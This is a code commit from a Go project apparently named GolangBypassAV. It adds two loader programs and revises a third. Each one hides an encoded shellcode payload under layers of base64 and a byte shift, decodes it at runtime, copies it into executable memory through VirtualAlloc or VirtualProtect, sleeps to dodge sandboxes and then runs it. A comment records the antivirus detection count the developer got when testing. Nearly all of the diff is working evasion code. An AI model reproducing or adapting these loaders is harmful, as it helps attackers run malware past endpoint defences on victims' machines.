增加virtualProtect

main.go

@@ -4,6 +4,7 @@ import (
 	"GolangBypassAV/encry"
 	"os"
 	"syscall"
+	"time"
 	"unsafe"
 )
 
@@ -18,8 +19,8 @@ var (
 	ntdll              = syscall.MustLoadDLL("ntdll.dll")
 	VirtualAlloc       = kernel32.MustFindProc("VirtualAlloc")
 	procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
-	//RtlCopyMemory      = ntdll.MustFindProc("RtlCopyMemory")
-	RtlMoveMemory = ntdll.MustFindProc("RtlMoveMemory")
+	RtlCopyMemory      = ntdll.MustFindProc("RtlCopyMemory")
+	RtlMoveMemory      = ntdll.MustFindProc("RtlMoveMemory")
 )
 
 func VirtualProtect(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
@@ -57,7 +58,7 @@ func genEXE(charcode []byte) {
 	syscall.Syscall(addr, 0, 0, 0, 0)
 }
 
-/*func genEXE1(shellcode []byte) {
+func genEXE1(shellcode []byte) {
 	addr, _, err := VirtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
 	if err != nil && err.Error() != "The operation completed successfully." {
 		syscall.Exit(0)
@@ -68,7 +69,7 @@ func genEXE(charcode []byte) {
 	}
 	time.Sleep(5 * time.Second)
 	syscall.Syscall(addr, 0, 0, 0, 0)
-}*/
+}
 
 func getFileShellCode(file string) []byte {
 	data := encry.ReadFile(file)

test2/main.go

@@ -0,0 +1,120 @@
+package main
+
+import (
+	"GolangBypassAV/encry"
+	"encoding/base64"
+	"fmt"
+	"os"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+)
+
+var kk = []byte{0x11}
+
+func base64Decode(data string) []byte {
+	data1, _ := base64.StdEncoding.DecodeString(data)
+	return data1
+}
+
+func base64Encode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+	return bdata
+}
+
+func getEnCode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+
+	bydata := []byte(bdata)
+	var shellcode []byte
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]+kk[0])
+	}
+	return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+var (
+	kernel32      = syscall.MustLoadDLL("kernel32.dll")
+	ntdll         = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc  = kernel32.MustFindProc("VirtualAlloc")
+	RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
+)
+
+func getDeCode(string2 string) []byte {
+
+	ss, _ := base64.StdEncoding.DecodeString(string2)
+	string2 = string(ss)
+	var shellcode []byte
+
+	bydata := []byte(string2)
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]-kk[0])
+	}
+	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	return ssb
+
+}
+
+func checkError(err error) {
+	if err != nil {
+		if err.Error() != "The operation completed successfully." {
+			println(err.Error())
+			os.Exit(1)
+		}
+	}
+}
+
+func genEXE(charcode []byte) {
+
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
+	if err != nil && err.Error() != "The operation completed successfully." {
+		syscall.Exit(0)
+	}
+	_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	if err != nil && err.Error() != "The operation completed successfully." {
+		syscall.Exit(0)
+	}
+	time.Sleep(5 * time.Second)
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+	time.Sleep(time.Duration(2) * time.Second)
+
+	dd := time.Now().UTC().UnixNano()
+	return dd + 123456
+
+}
+
+func getFileShellCode(file string) []byte {
+	data := encry.ReadFile(file)
+	//shellCodeHex := encry.GetBase64Data(data)
+	//fmt.Print(shellCodeHex)
+	return data
+}
+
+func getFileShellCode1(file string) string {
+	data := encry.ReadFile(file)
+	shellCodeHex := base64Encode(data)
+	fmt.Print(shellCodeHex)
+	return shellCodeHex
+}
+
+func main() {
+	//fmt.Println(1)
+
+	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
+
+	bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg=="
+	shellCodeHex := getDeCode(bbdata)
+	gd()
+	genEXE(shellCodeHex)
+}

test3/main.go

@@ -0,0 +1,141 @@
+package main
+
+import (
+	"GolangBypassAV/encry"
+	"encoding/base64"
+	"os"
+	"syscall"
+	"time"
+	"unsafe"
+)
+
+const (
+	MEM_COMMIT             = 0x1000
+	MEM_RESERVE            = 0x2000
+	PAGE_EXECUTE_READWRITE = 0x40
+	PAGE_READWRITE         = 0x04
+)
+
+var kk = []byte{0x11}
+
+func base64Decode(data string) []byte {
+	data1, _ := base64.StdEncoding.DecodeString(data)
+	return data1
+}
+
+func base64Encode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+	return bdata
+}
+
+func getEnCode(data []byte) string {
+	bdata := base64.StdEncoding.EncodeToString(data)
+
+	bydata := []byte(bdata)
+	var shellcode []byte
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]+kk[0])
+	}
+	return base64.StdEncoding.EncodeToString(shellcode)
+}
+
+var (
+	kernel32           = syscall.MustLoadDLL("kernel32.dll")
+	ntdll              = syscall.MustLoadDLL("ntdll.dll")
+	VirtualAlloc       = kernel32.MustFindProc("VirtualAlloc")
+	procVirtualProtect = syscall.NewLazyDLL("kernel32.dll").NewProc("VirtualProtect")
+	RtlMoveMemory      = ntdll.MustFindProc("RtlMoveMemory")
+)
+
+func virtualProtect1(lpAddress unsafe.Pointer, dwSize uintptr, flNewProtect uint32, lpflOldProtect unsafe.Pointer) bool {
+	//fmt.Println(1)
+	ret, _, _ := procVirtualProtect.Call(
+		uintptr(lpAddress),
+		uintptr(dwSize),
+		uintptr(flNewProtect),
+		uintptr(lpflOldProtect))
+	return ret > 0
+}
+
+func getDeCode(string2 string) []byte {
+
+	ss, _ := base64.StdEncoding.DecodeString(string2)
+	string2 = string(ss)
+	var shellcode []byte
+
+	bydata := []byte(string2)
+
+	for i := 0; i < len(bydata); i++ {
+		shellcode = append(shellcode, bydata[i]-kk[0])
+	}
+	ssb, _ := base64.StdEncoding.DecodeString(string(shellcode))
+	return ssb
+
+}
+
+func checkError(err error) {
+	if err != nil {
+		if err.Error() != "The operation completed successfully." {
+			println(err.Error())
+			os.Exit(1)
+		}
+	}
+}
+
+func genEXE(charcode []byte) {
+
+	//申请只能读写内存
+	addr, _, err := VirtualAlloc.Call(0, uintptr(len(charcode)), MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE)
+	if addr == 0 {
+		checkError(err)
+	}
+	gd()
+	var oldshellcodeperms uint32
+	//改成读写执行
+	virtualProtect1(unsafe.Pointer(&addr), uintptr(len(charcode)), PAGE_EXECUTE_READWRITE, unsafe.Pointer(&oldshellcodeperms))
+
+	_, _, err = RtlMoveMemory.Call(addr, (uintptr)(unsafe.Pointer(&charcode[0])), uintptr(len(charcode)))
+	checkError(err)
+
+	gd()
+	for j := 0; j < len(charcode); j++ {
+		charcode[j] = 0
+	}
+	syscall.Syscall(addr, 0, 0, 0, 0)
+}
+
+func gd() int64 {
+	time.Sleep(time.Duration(2) * time.Second)
+
+	dd := time.Now().UTC().UnixNano()
+	return dd + 123456
+
+}
+
+func getFileShellCode(file string) []byte {
+	data := encry.ReadFile(file)
+	//shellCodeHex := encry.GetBase64Data(data)
+	//fmt.Print(shellCodeHex)
+	return data
+}
+
+func getFileShellCode1(file string) string {
+	data := encry.ReadFile(file)
+	shellCodeHex := base64Encode(data)
+	//fmt.Print(shellCodeHex)
+	return shellCodeHex
+}
+
+func main() {
+	//用了virtualProtect没什么明显提升，还是7个
+
+	//fmt.Println(1)
+
+	//fmt.Print(getEnCode(getFileShellCode("C:\\Users\\Administrator\\Desktop\\payload.bin")))
+
+	bbdata := "QFZ6VUZhVYCKUlJSUlZXY2JnU2RmZ2taXnVbfWRahWRqVnpdZnl5WnpCWnhkWoWKZlZ4YYVBgVxlZVlbZFVZUoNViXl3UlqEWlZZU4piQlNSdFl6SGdbU2Zmel1melRdYnuJWlJ1U354aXhqVIhbQnSAhlJ6UlJSUlZ6V4hZY39kUlliZlqFWlhWZF1iVFNbUnVVe2d8e0CKZlhdX1p5WlJ1a19edH1aXnRUhGJ0WVtVZlZTiGV7eHV3V15SQYh8VFZmRkFpaWpoVmRdYlRjW1J1U35iaoReZFZkXWJTiVtSdVNTeohkWmRSWWJiZ3lTaFdGa2h8V2piZ31TaHx6VUhUU1Nmh0B4aFZXa2h8el1Whn1hQEBAQGlogFJkc0ZEcmhGgXN+Z0FSVldoZGp/fmVaf4lic4FedYpqWUBKZ1pedH1aXnVbX150U19edH1TZlZXYmJzgEdnf35/QEppg3RCgVp6dFdThlRSVVJSU19edH1TZmZXY3J4X1NmZlhHZ0V+d4mHQGdHQn1zZFp/U2RVWWRkan9qZWVZW2Z+eFJSfFRWZn1bU4aGhWdde4dAQmZ6W4l8elWIQlOCVH1KWnp3V1p6dYFbiUlVQEBAQEBlZVlbZn1bU4Z6QVhYWYdAQmppUlVFaHVSYlJSZGFAYVVFZF5SYlJSR0phgUZSVlJSYHp6QEBAQF1EfUdfi15SfGtoZ3VVdWZScnpKgHJlW1eBRlOFhkaAalZfhmJzc0J5gF14a4p+QHmDemZFd0d8X0mFfWmIi31HcoJYf3mIamSIYIODX15GQGKGYXN4Z1dkf4tHSIZiRIl6ZWpJhINbdlJTZ3RDZ4pdZld/a2hGQWB6U19zRIGBc1iJeV2LZoZeVFKAakNKhXRYV0FyaFuEa2WEeGVnX1tjZFJGXXtSSFpZV3xraV+DWlVahl9URYlee2qLXXtaiF6LhHhnQ32Ga1hKRHSKU2BnVFJDXXtWSFpXdWFni2pBYIpTZnR+fXxraEZBXYtmhl5UfF9UeFJpaX9Dh0JIc2dUSF92il9ci19nQ4lFa0p+g3t6f0iKiWRkfmlnQ35ad3J6UouFglNog3VaXHRagEpaYEpBf4hpfXuLYXR7RXpKZlVqZmJTa2JKSEBZaEB+WXuJholGaEZkRohUZIFCRFViSGWIY354c1aIRVNSiFlIRWN5YXiHfHJDRYE8doRgflxXRX5KSnVnSUqFW3pZeHqEVmlaWkNBRH6Gi4ZeY4hWaH2Ee1hdYWB6X0VBfmBbd1l7Q3xkh1pHWkFKaIBHYmZ3RFV2dEZnWGGJe1lIfkOHc1Z0Z0dzQXeAg4BJVFyKdWSJWkhocoVIWn1lWGeJgXp2gUaDW35nX1mDRXVFi1pSYnNIiIVyW2hASmdaXnR+R1JSU1JSVlhFUlNSUlJWWEZiUlJSUlZYR2hcY2VGd0BnZFtfZWZBeltGQXpbSWZ6W0N8WEVSVFJSUlZ+WzxmWEdWgXJbRYdAZ2RaYVZaWmlSdV1rfnqIdVpSdGBXiFlpaWhXeWpkUmZSUlJSUmZeYYB/QERAQItWil56RUZde1ZCX4pFiV57WlJWe2NodlJOTg=="
+	shellCodeHex := getDeCode(bbdata)
+	gd()
+	genEXE(shellCodeHex)
+}